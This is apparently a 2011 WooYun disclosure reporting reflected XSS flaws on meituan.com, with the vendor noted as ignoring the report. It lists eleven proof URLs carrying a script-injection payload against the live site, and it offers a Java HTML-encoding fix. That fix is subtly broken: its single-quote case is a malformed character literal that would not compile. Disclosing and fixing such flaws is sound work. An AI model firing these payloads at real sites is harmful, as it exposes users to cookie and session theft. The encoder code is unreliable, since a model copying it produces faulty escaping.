当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02057

漏洞标题:美团网存在多个反射型XSS

相关厂商:美团网

漏洞作者: eke

提交时间:2011-05-05 15:16

修复时间:2011-05-06 10:51

公开时间:2011-05-06 10:51

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-05-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

美团网存在多个反射型的XSS漏洞,该漏洞是由于没有对用户输入进行验证导致的。攻击者利用该漏洞,可能盗取用户Cookie。

详细说明:

美团网以下页面存在反射型XSS:
http://www.meituan.com/
http://www.meituan.com/index/
http://www.meituan.com/index/?province=110000
http://www.meituan.com/about/
http://www.meituan.com/about/privacy/
http://www.meituan.com/feedback/
http://www.meituan.com/mobile/
http://www.meituan.com/merchants/
http://www.meituan.com/account/referrals/
http://www.meituan.com/account/signup/
http://www.meituan.com/help/api/

漏洞证明:

http://www.meituan.com///"></a><script>alert(/xss/)</script>



http://www.meituan.com/index//"></a><script>alert(/xss/)</script>



http://www.meituan.com/index/?province=110000"></a><script>alert(/xss/)</script>&city=bj



http://www.meituan.com/about//"></a><script>alert(/xss/)</script>



http://www.meituan.com/about/privacy/"></a><script>alert(/xss/)</script>



http://www.meituan.com/feedback//"></a><script>alert(/xss/)</script>



http://www.meituan.com/mobile//"></a><script>alert(/xss/)</script>



http://www.meituan.com/merchants//"></a><script>alert(/xss/)</script>



http://www.meituan.com/account/referrals/"></a><script>alert(/xss/)</script>



http://www.meituan.com/account/signup/"></a><script>alert(/xss/)</script>



http://www.meituan.com/help/api/"></a><script>alert(/xss/)</script>


修复方案:

在ASP/ASP.net中,可以使用:

Server.HTMLEncode(strHTML String)


在Java中,可以使用:

public static String HTMLEncode(String aTagFragment)
{
final StringBuffer result = new StringBuffer();
final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment);
char character = iterator.current();
while (character != StringCharacterIterator.DONE ){
if (character == '<') {
result.append("&lt;");
}
else if (character == '>') {
result.append("&gt;");
}
else if (character == '\"') {
result.append("&quot;");
}
else if (character == '\") {
result.append("&#039;");
}
else if (character == '\\') {
result.append("&#092;");
}
else if (character == '&') {
result.append("&amp;");
}
else {
// 如果字符不是特殊字符,则直接添加到结果中
result.append(character);
}
character = iterator.next();
}
return result.toString();
}

版权声明:转载请注明来源 eke@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:3 (WooYun评价)